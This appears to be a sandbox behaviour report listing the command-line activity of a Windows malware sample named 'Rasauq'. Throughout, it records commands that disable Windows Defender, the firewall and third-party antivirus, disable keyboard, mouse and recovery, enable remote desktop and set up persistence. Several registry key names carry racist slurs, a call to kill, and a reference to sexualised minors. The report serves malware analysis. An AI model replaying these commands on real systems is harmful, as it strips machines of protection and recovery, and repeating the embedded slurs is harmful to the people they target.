  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:5844
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:2928
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3132
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5140
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:3560
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1748
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5432
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:5508
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:5168
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:5524
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:6044
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:4900
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5352
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:2388
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:4976
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:3028
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:1620
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:4380
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4324
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3920
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3768
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:1224
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:2712
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:1964
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:2708
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:4120
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:3420
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:296
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5416
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:6056
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:4224
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in Windows directory
      PID:5760
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5516
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3740
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3540
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1188
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1772
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3544
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:2332
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:3356
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4264
  - - C:\Windows\system32\net.exe
      net stop "SDRSVC"
      4⤵
      PID:5404
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SDRSVC"
        5⤵
        
        PID:5852
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:3808
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:3812
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2656
  - - C:\Windows\system32\net.exe
      net stop "security center"
      4⤵
      PID:1304
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "security center"
        5⤵
        
        PID:1164
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode-disable
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1160
  - - C:\Windows\system32\net.exe
      net stop "wuauserv"
      4⤵
      PID:5044
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wuauserv"
        5⤵
        
        PID:5716
  - - C:\Windows\system32\net.exe
      net stop "Windows Defender Service"
      4⤵
      PID:3012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Defender Service"
        5⤵
        
        PID:5372
  - - C:\Windows\system32\net.exe
      net stop "Windows Firewall"
      4⤵
      PID:6088
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Windows Firewall"
        5⤵
        
        PID:4668
  - - C:\Windows\system32\net.exe
      net stop sharedaccess
      4⤵
      PID:4672
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop sharedaccess
        5⤵
        
        PID:1248
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3560
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2060
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5432
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:5880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6124
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2804
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5468
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4808
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5180
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1808
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:1252
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:6028
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:2324
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:3552
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      Launches sc.exe
      PID:3940
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:5680
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:3536
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      PID:3360
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      PID:3320
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:5444
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:2992
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:3404
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:5704
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:4504
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:4864
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:6132
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3308
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5844
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:72
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1644
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6128
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6020
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3468
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5160
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2060
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      PID:3688
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:1448
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:2908
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:4540
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:3672
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:4936
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:976
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:5480
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:2916
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      PID:2096
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:1452
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:5688
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      PID:4948
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:436
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      PID:4868
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:4848
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:1496
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:4824
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:2828
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:4536
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:3068
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:4336
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:3652
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:4352
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:4836
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:3632
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:296
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:796
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:4084
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4732
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:2000
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4776
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:2424
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:912
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:244
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:4224
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:5592
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:4556
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:2428
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:4808
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      PID:2740
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      PID:5848
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      PID:1668
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      PID:1168
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3424
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1480
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5224
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4148
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:3748
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:3680
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:1060
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:4280
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4056
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1044
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3700
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5692
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5940
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1868
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      PID:1304
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      PID:1340
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      PID:3436
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      PID:808
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:3864
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:5192
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:4064
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:5784
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:3096
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:2928
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:6140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:6100
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:3476
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      PID:4516
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4360
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1780
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5800
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2016
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1644
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
      4⤵
      PID:944
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5832
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5264
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:4668
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2328
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4664
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5724
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      PID:5236
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:1248
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2616
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
